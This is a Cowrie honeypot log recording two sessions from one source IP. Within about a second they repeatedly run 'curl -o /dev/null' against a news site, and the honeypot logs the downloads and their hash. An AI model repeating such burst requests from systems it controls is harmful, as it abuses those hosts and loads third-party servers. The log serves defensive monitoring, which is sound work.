{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.129540Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.150180Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.151200Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.170873Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.172226Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.174203Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.206339Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.207308Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.209404Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.210248Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.248482Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.249547Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.251762Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.252686Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.286042Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.287076Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.293240Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.294382Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.295346Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.331649Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.332663Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.343100Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.343984Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.384793Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.385876Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.410002Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.410950Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.433858Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.434798Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.453654Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.454651Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.468415Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.469301Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.492408Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.493299Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.504788Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.505692Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.531288Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.532248Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.545963Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.547438Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.572529Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.573530Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.583260Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.584165Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.610504Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.611560Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.620703Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.621719Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.652055Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.653172Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.654042Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.666260Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.667361Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.704447Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.705608Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.708587Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.709323Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.752750Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.753739Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.756462Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.757669Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.764728Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.800889Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.802658Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.806117Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.807443Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.825785Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.847362Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.848503Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.851037Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.852463Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.891309Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.892708Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.896064Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.897715Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.925131Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.935865Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.936939Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.942422Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.944453Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.950414Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.967260Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.979595Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.980536Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.987349Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.993146Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:11.998538Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:11.999881Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.020800Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.024997Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.025985Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.039872Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.047016Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.048076Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.064358Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.066241Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.108121Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.109542Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.114458Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.116537Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.121717Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.122690Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.153878Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.155272Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.159740Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.160760Z","src_ip":"212.227.125.160","session":"7541ed730449"}
